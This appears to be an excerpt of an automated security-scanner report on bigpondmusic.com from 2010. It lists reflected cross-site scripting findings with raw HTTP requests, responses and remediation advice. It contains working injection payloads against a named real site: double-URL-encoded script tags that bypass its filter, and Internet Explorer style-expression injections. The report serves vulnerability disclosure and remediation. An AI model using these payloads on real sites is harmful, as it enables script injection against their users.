HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 229873
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Albums $13 and Under - BigPo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13?874f6"style="x:expression(alert(1))"4e4f0e24928=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9c2'%3bab1ce357a08 was submitted in the REST URL parameter 1. This input was echoed as ce9c2';ab1ce357a08 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargainsce9c2'%3bab1ce357a08/under13/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87802
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd was submitted in the REST URL parameter 1. This input was echoed as 107c8"><script>alert(1)</script>43f02f38efd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd/under13/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87834
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b64'%3b7b1bcc8a715 was submitted in the REST URL parameter 2. This input was echoed as 38b64';7b1bcc8a715 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains/under1338b64'%3b7b1bcc8a715/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88037
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9 was submitted in the REST URL parameter 2. This input was echoed as b1ade"><script>alert(1)</script>44d7c5038c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains/under13b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:49:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87904
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.181. http://bigpondmusic.com/bargains/under13/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/bargains/under13/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b12d9"style="x:expression(alert(1))"52b563ab311 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bargains/under13/?b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:48:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 229841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Albums $13 and Under - BigPo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?b12d9"style="x:expression(alert(1))"52b563ab311=1" /> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a14"style%3d"x%3aexpression(alert(1))"fe980943757 was submitted in the ref parameter. This input was echoed as 29a14"style="x:expression(alert(1))"fe980943757 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bargains/under13/?ref=Net-Head-Music-Bargains29a14"style%3d"x%3aexpression(alert(1))"fe980943757 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 229900
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Albums $13 and Under - BigPo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?ref=Net-Head-Music-Bargains29a14"style="x:expression(alert(1))"fe980943757" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e was submitted in the REST URL parameter 1. This input was echoed as 8cf67"><script>alert(1)</script>2659a2ed60e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e/under5 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87831
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 444ae'%3b14886af3365 was submitted in the REST URL parameter 1. This input was echoed as 444ae';14886af3365 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains444ae'%3b14886af3365/under5 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87901
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 was submitted in the REST URL parameter 2. This input was echoed as 625b9"><script>alert(1)</script>473a7d2f336 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains/under5625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88122
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae4bb'%3b381fbba2e70 was submitted in the REST URL parameter 2. This input was echoed as ae4bb';381fbba2e70 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains/under5ae4bb'%3b381fbba2e70 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87901
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.187. http://bigpondmusic.com/bargains/under5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/bargains/under5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e23"style%3d"x%3aexpression(alert(1))"359e420ded3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86e23"style="x:expression(alert(1))"359e420ded3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bargains/under5?86e23"style%3d"x%3aexpression(alert(1))"359e420ded3=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 195591
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e was submitted in the REST URL parameter 1. This input was echoed as 2cdfa"><script>alert(1)</script>ec42ffa9a0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bigpondrecommends2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87807
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52be7'%3b8ce78a5cd85 was submitted in the REST URL parameter 1. This input was echoed as 52be7';8ce78a5cd85 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bigpondrecommends52be7'%3b8ce78a5cd85 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87734
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.190. http://bigpondmusic.com/bigpondrecommends [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/bigpondrecommends
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e216c"style%3d"x%3aexpression(alert(1))"e688e780f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e216c"style="x:expression(alert(1))"e688e780f68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bigpondrecommends?e216c"style%3d"x%3aexpression(alert(1))"e688e780f68=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 154471
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>What are BigPond Music liste ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bigpondrecommends?e216c"style="x:expression(alert(1))"e688e780f68=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dc80'%3b9d005988f07 was submitted in the REST URL parameter 1. This input was echoed as 4dc80';9d005988f07 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87944
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc31052876 was submitted in the REST URL parameter 1. This input was echoed as 1ed91"><script>alert(1)</script>fc31052876 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
